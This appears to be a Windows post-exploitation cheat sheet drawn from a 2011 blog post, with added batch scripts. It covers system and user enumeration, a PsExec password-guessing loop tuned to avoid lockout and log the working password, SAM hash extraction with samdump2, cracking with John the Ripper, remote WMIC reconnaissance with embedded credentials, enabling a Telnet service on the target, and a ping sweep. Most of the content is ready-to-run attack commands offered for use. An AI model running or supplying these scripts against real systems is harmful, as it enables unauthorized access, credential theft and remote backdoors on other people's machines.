The full output of each command is in the Source linked at the end of the list.
Gathering system-related information
C:\>systeminfo
Running Services
C:\>tasklist /svc
Installed Services
C:\>sc query state= all
Current environment settings
C:\>set
Find Username
C:\>set | find "USERNAME"
Find Domain
C:\>set | find "USERDOMAIN"
Find Current User Information (John is the sample account; %USERNAME% expands to whoever is logged on)
C:\>net user %USERNAME%
Find Users with Administrator Privileges in the current machine
C:\>net localgroup Administrators
Password Guessing with PsExec (each failed logon is recorded on the target and counts toward any lockout threshold; check "net accounts" first)
Username: Jack  Computer Name: XP-INTRANET  Password List: PassList.txt
The computer name goes to PsExec as \\XP-INTRANET; "delims=" makes FOR /f try each line whole, so passwords containing spaces are not cut off. The marker line is printed only when psexec exits 0, which it does when the logon worked and ipconfig ran.
C:\DOCUME~1\John>FOR /f "delims=" %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i ipconfig 2>nul && echo ***************** %i *****************
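The same guessing loop as a script, added here as an example and not part of the original page: it stops at the first password that works, logs every attempt, and reports how many were tried. Target, account and list name are the sample values above; the log file name and the requirement that psexec.exe is on PATH are assumptions.

```batch
@echo off
REM Added example, not from the original page: PsExec password guessing for one account
REM that stops at the first hit and logs each attempt. Target, account and list name are
REM the page's sample values; the log file name is an assumption. psexec.exe must be on PATH.
setlocal EnableDelayedExpansion
set "TARGET=\\XP-INTRANET"
set "USER=Jack"
set "LIST=PassList.txt"
set "LOG=guess-%USER%.log"
set /a TRIES=0

if not exist "%LIST%" (
    echo password list "%LIST%" not found
    exit /b 2
)

REM "delims=" keeps the whole line, so passwords containing spaces are tried intact
for /f "usebackq delims=" %%p in ("%LIST%") do (
    set /a TRIES+=1
    REM psexec returns the remote command's exit code (0 for ipconfig) when the logon
    REM worked and a non-zero code when it did not; the output itself is discarded
    psexec /accepteula %TARGET% -u %USER% -p "%%p" ipconfig >nul 2>&1
    if !errorlevel! equ 0 (
        echo [+] !DATE! !TIME! %USER% / %%p works on %TARGET% >> "%LOG%"
        echo [+] found after !TRIES! tries: %USER% / %%p
        exit /b 0
    )
    echo [-] try !TRIES!: %%p failed >> "%LOG%"
)
echo [-] none of %TRIES% passwords in "%LIST%" worked for %USER%
exit /b 1
```

Two caveats: delayed expansion strips "!" from a password, so a list containing such entries needs the check done another way, and the loop has no lockout awareness of its own. Run "net accounts" (or "net accounts /domain") and read the "Lockout threshold" line before starting; staying below it per observation window is what keeps the account usable. PsExec also installs and starts its PSEXESVC service on the target for every successful logon, which is far more visible than a plain SMB session.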
Extract hashes from copies of the SAM and SYSTEM hives with samdump2 (the SYSTEM hive holds the boot key that decrypts the SAM; current samdump2 takes the system hive first, then the sam hive, while older releases needed bkhive to write the key to a file first)
:~# samdump2 system sam > hashes.txt
Password cracking with John the Ripper using a wordlist (hashes.txt is in pwdump form, user:rid:LM:NT:::; --format=nt cracks the NT field, --format=lm the LM field that XP still stores by default; "john --show --format=nt hashes.txt" prints what was cracked)
# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt
Gather DNS Information
C:\>ipconfig /displaydns
Remote queries over WMI (DCOM: TCP 135 plus a dynamic port) with the credentials on the command line; leaving out /password makes wmic prompt for it, which keeps the secret out of the local process list and command history.
OS Information
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ os get name,servicepackmajorversion
Installed Software (Win32_Product only lists MSI-installed packages and triggers a consistency check of each one, so it is slow and leaves event-log entries)
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ product get name,version
Running Processes
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ process list brief
Local Drives Info
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ logicaldisk get
Shares Info
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ share list /format:table
Network Info
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ nicconfig get
List Services Information
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service get /format:list
Find a specific Service State
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" get name,state,startmode
Change start mode of service to automatically start upon boot (Win32_Service.ChangeStartMode; a ReturnValue of 0 means the call succeeded)
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" call ChangeStartMode "Automatic"
Starting telnet service (Win32_Service.StartService)
C:\>wmic /node:192.168.168.140 /user:IWAM_NETASPS /password:$ecretP4$$ service where DisplayName="Telnet" call StartService
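The remote WMIC queries above collected into one script, added here as an example and not part of the original page: the host and credentials are set once, each class is queried into a report file, and the Telnet service is changed only after its current state has been recorded and then verified again. Host, account and password are the sample values from the page; the report file name is an assumption.

```batch
@echo off
REM Added example, not from the original page: run the WMIC queries above against one
REM remote host with the credentials set once, write a report, then enable the Telnet
REM service with a state check before and after. Host/user/password are the page's
REM sample values; the report file name is an assumption.
setlocal
set "NODE=192.168.168.140"
set "CRED=/user:IWAM_NETASPS /password:$ecretP4$$"
set "REPORT=%NODE%-wmic.txt"
if exist "%REPORT%" del "%REPORT%"

REM One wmic invocation per class; /format:list keeps long values on their own lines.
REM Quoted items let the comma-separated property lists survive the FOR parser.
for %%q in (
    "os get name,servicepackmajorversion,version"
    "product get name,version"
    "process get name,processid,commandline"
    "logicaldisk get deviceid,filesystem,size,freespace"
    "share get name,path,description"
    "nicconfig where ipenabled=true get ipaddress,defaultipgateway,dnsserversearchorder"
    "service get name,displayname,state,startmode"
) do (
    echo ===== %%~q ===== >> "%REPORT%"
    wmic /node:%NODE% %CRED% %%~q /format:list >> "%REPORT%" 2>&1
)

REM Service change: record the state, set the start mode, start it, verify.
REM A "ReturnValue = 0" line after each call means the method succeeded.
set "SVC=Telnet"
wmic /node:%NODE% %CRED% service where displayname="%SVC%" get name,state,startmode /format:list
wmic /node:%NODE% %CRED% service where displayname="%SVC%" call ChangeStartMode "Automatic"
wmic /node:%NODE% %CRED% service where displayname="%SVC%" call StartService
wmic /node:%NODE% %CRED% service where displayname="%SVC%" get name,state,startmode /format:list

echo [+] report written to "%REPORT%"
endlocal
```

wmic writes UTF-16 when its output is redirected, so read the report with "type" or an editor rather than tools that expect ASCII. The password still sits on the command line of every wmic process this script starts; for an interactive session, drop /password from CRED and answer the prompt instead.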
Ping Sweep (match on "TTL=" rather than "Reply": a gateway's "Reply from <gateway>: Destination host unreachable" also contains the word "Reply")
C:\>FOR /L %i in (1,1,255) do @ping -n 1 192.168.168.%i | find "TTL="
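The sweep as a script, added here as an example and not part of the original page: it keeps only hosts that actually answered, caps the wait per address, and afterwards reads the local ARP cache, which also picks up same-subnet hosts that filtered ICMP. The network prefix is the page's; the output file name is an assumption.

```batch
@echo off
REM Added example, not from the original page: ping sweep of one /24 that records only
REM hosts that answered, then lists the ARP-cache neighbours discovered on the way.
REM Network prefix is the page's; the output file name is an assumption.
setlocal
set "NET=192.168.168"
set "OUT=%NET%-alive.txt"
if exist "%OUT%" del "%OUT%"

REM Match on "TTL=": "Reply from <gateway>: Destination host unreachable" also contains
REM "Reply", so filtering on that word reports dead hosts as alive.
REM -w 300 limits the wait per host to 300 ms so the sweep finishes in reasonable time.
for /L %%i in (1,1,254) do (
    ping -n 1 -w 300 %NET%.%%i | find "TTL=" >nul && echo %NET%.%%i >> "%OUT%"
)
echo [+] hosts that answered ICMP:
type "%OUT%"

REM Hosts on the same subnet that drop ICMP still answer the ARP request sent before each
REM ping, so their entries now sit in the local ARP cache marked "dynamic".
echo [+] ARP-cache neighbours (includes hosts that filtered ICMP):
arp -a | find "dynamic"
endlocal
```

The ARP step only helps for the subnet the scanning host sits on; for remote ranges, traffic goes through the gateway and only ICMP replies count.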
Source: http://www.ikuppu.com/2011/09/windows-post-exploitation.html
Commands for Information Gathering in Windows Post-Exploitation
This post walks through a set of methods and techniques for collecting information about a Windows system: basic system information, running services, environment variables, user information, network configuration and more. It also covers password guessing, hash extraction and hash cracking with specific tools.